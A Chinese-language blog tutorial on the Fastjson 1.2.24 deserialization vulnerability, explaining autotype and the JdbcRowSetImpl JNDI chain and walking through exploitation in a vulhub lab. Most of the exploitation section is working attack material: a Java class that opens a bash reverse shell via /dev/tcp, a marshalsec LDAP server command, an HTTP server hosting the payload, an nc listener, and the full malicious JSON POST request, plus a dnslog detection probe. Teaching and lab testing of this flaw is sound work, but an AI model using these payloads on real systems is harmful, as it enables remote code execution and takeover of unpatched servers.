Fastjson反序列化漏洞详解

我就是我 2024-03-25 09:44 83阅读 0赞

## 一、什么是序列化/序列化？ ##

![a9e9b222d08f4aa586ad8d5cf683c061.png][]

序列化主要使用场景：

1.  持久化内存数据
2.  网络传输对象
3.  远程方法调用（RMI）

## 二、什么是Fastjson? ##

fastjson介绍：fastjson 是一个java语言编写的高性能且功能完善的JSON库，它采用一种“假定有序快速匹配”的算法，把JSON Parse 的性能提升到了极致。FastJson是啊里巴巴的的开源库，用与对JSON格式的数据进行解析和打包。

Fastjson的特点：

1.  速度快
2.  使用广泛
3.  测试完备
4.  使用简单
5.  功能完备

JSON数据格式\{"name"：zy, "age"：22, "flag"：true, "gender"：male, "address"：cs\}("key"：value)

## 三、Fastjson反序列化漏洞的原理与利用思路 ##

1.  Fastjson在序列化的时候，会调用成员变量的get方法，私有成员变量不会被序列。
2.  Fastjson在反序列化的时候，**会调用成员变量的set方法**，public修饰的成员全部自动赋值。

原理：由于它在反序列一个对象的时候会去自动调用这个对象的set方法，所以如果这个set方法中有一些危险的操作，那么就会导致漏洞的产生。

利用思路：上面说了在fastjson反序列化的时候会自动调用对象的set方法，所以我们就有了利用思路，如果我们可以找到一个类，并且这个类中有set方法，这个类的set方法中有一些敏感操作，并且每次运行任意java代码的时候又必须调用这个类，那我们就可以利用这个漏洞了。

经过大佬的总结，以下这几个类就是我们上面所说的类(这些类都是jdk中的，也就是说不管你运行什么样的代码，它都会调用下面这几个类)：

1.  com.sun.rowset
2.  **JdbcRowSetlmpl**
3.  **Templateslmpl**
4.  com.sun.org.apache.xalan.internal.xsltc.trax

### 思考：Fastjson可以支持任意类的反序列化吗？ ###

Fastjson反序列的方法有俩种：

1.  JSON.parseObject()返回实际类型对象
2.  JSON.parse()返回JsonObject对象

在序列化的时候，如果子类中包含接口或抽象类的时候，序列化后类型会丢失，所以fastjson为了解决这个问题，提供了一个自省（Autotype）功能，这个功能会给fastjson在序列化后的字符串前面加上类型\{ **"@type"："com.zy.json.User"**，"age"：33，"flag"：false，"name"："zy"\}。

这样在反序列化的时候就可以找到所属的类，也就导致fastjson可以支持任意类的反序列化。

## 四、靶场搭建 ##

1.  我们需要准备俩台虚拟机，一台虚拟机里面必须装有docker，这台虚拟机为靶机，然后用docker去拉取vulhub靶场，以vulhub靶场中的/fastjson/1.2.24-rce漏洞为例，docker安装教程与靶场拉取教程：[https://vulhub.org/\#/docs/][https_vulhub.org_docs]
2.  另一台虚拟机为kali作为攻击机

## 五、漏洞利用流程 ##

1.  首先我们使用java需要编写一个恶意代码用于反弹shell
    
        public class LinuxRevers{
            static {
                try {
                    Runtime rt = Runtime.getRuntime();
                    String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/自己用于反弹虚拟机的ip/反弹端口 0>&1"};
                    Process pc = rt.exec(commands);
                    pc.waitFor();
                } catch (Exception e) {
                }
            }
        }
2.  将上面编写的恶意代码编译后放在我们的攻击机kali当中（**注意：kali中的jdk版本必须和编译这个恶意代码的jdk版本一致，如不一致务必请切换kali中的jdk版本**）。
3.  在我们的kali中我们需要启动一个LDAP服务（LDAP服务的搭建自己网上搜去，简单着呢）：
    
        java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://kali的IP：端口/#LinuxRevers" 9473
    
    启动LDAP服务的目的就是为了让LDAP服务去引导我们的攻击网站，引导它去访问我们的http服务并且下载我们的恶意软件
4.  所以我们还需要在我们刚才存放恶意代码的目录下开启一个http服务：
    
        python -m http.server 8089
    
    这样，当目标服务器访问我们的LDAP服务时，就会跳转到我们的http服务上去下载我们的恶意代码。
5.  在去开一个用于接收反弹shell的端口：
    
        nc -lvp 9001
6.  现在一切准备工作都做好了，只欠东风！上面所说的去利用LDAP服务去诱导目标服务器下载恶意代码，那么问题来了，我怎么去让目标服务器去访问我们的LDAP服务呢？我们其实可以用BP去构造一个数据包然后发给服务器，让服务器去访问我们的LDAP服务，当我们把下面构造好的数据包发送之后，我们就会在刚才用nc监听的端口那里看到反弹过来的shell了。
    
    > POST / HTTP/1.1  
    > Host: 43.129.135.123:8090(你的靶机ip加端口)  
    > Connection: keep-alive  
    > Upgrade-Insecure-Requests: 1  
    > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
    > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
    > Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
    > Accept-Encoding: gzip, deflate  
    > Content-Type: application/json  
    > Content-Length: 154
    > 
    > \{  
    > "b": \{  
    > "@type": "com.sun.rowset.JdbcRowSetImpl",  
    > "dataSourceName": "ldap://192.138.152.128:9473（你开启LNAP服务攻击机的ip加监听端口）/LinuxRevers",  
    > "autoCommit": true  
    > \}  
    > \}
7.  整个利用链：  
    （1）本次攻击流程主要使用了JDK库中的JdbcRowSetlmpl类  
    （2）JdbcRowSetlmpl在反序列化时会自动调用setDataSourceName方法与setAutoCommit方法  
    （3）setDataSourceName方法会将DataSource的值赋为我们上面数据包中的值：ldap://192.138.152.128:9473/LinuxRevers  
    （4）setAutoCommit方法会调用connect()方法  
    （5）connect()又会调用lookup()连接到LDAP/RMI服务器:
    
        DataSource ds = (DataSource)ctx.lookup(getDataSourceName());

（6）下载恶意代码到本地，执行，攻击发生

## 六、漏洞挖掘思路 ##

1.  找到它发送json序列化数据的接口
2.  判断它是否使用fastjson:  
    (1)非法格式报错：  
    利用BP去发送一些非法格式，如：\{"x":" 它的返回包中可能会直接暴出来它的java包名  
    (2)使用dnslog探测  
    \{"x":\{"@type":"java.net.lnet4Address","val":"xxx.dnslog.cn"\}\}  
    如果在dnslong服务器那有回显，那就证明它使用了fastjson
3.  扫描工具：[https://github.com/zilong3033/fastjsonScan][https_github.com_zilong3033_fastjsonScan]

## 七、漏洞修复 ##

*  升级JDK
 *  升级Fastjson到最新版
 *  使用安全产品过滤
 *  更换其他序列化工具，如Jackson、Gson。

## 八、免责声明 ##

文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

[a9e9b222d08f4aa586ad8d5cf683c061.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/25/91097a1c9a2e4d3592de1f979bbb6d76.png
[https_vulhub.org_docs]: https://vulhub.org/#/docs/
[https_github.com_zilong3033_fastjsonScan]: https://github.com/zilong3033/fastjsonScan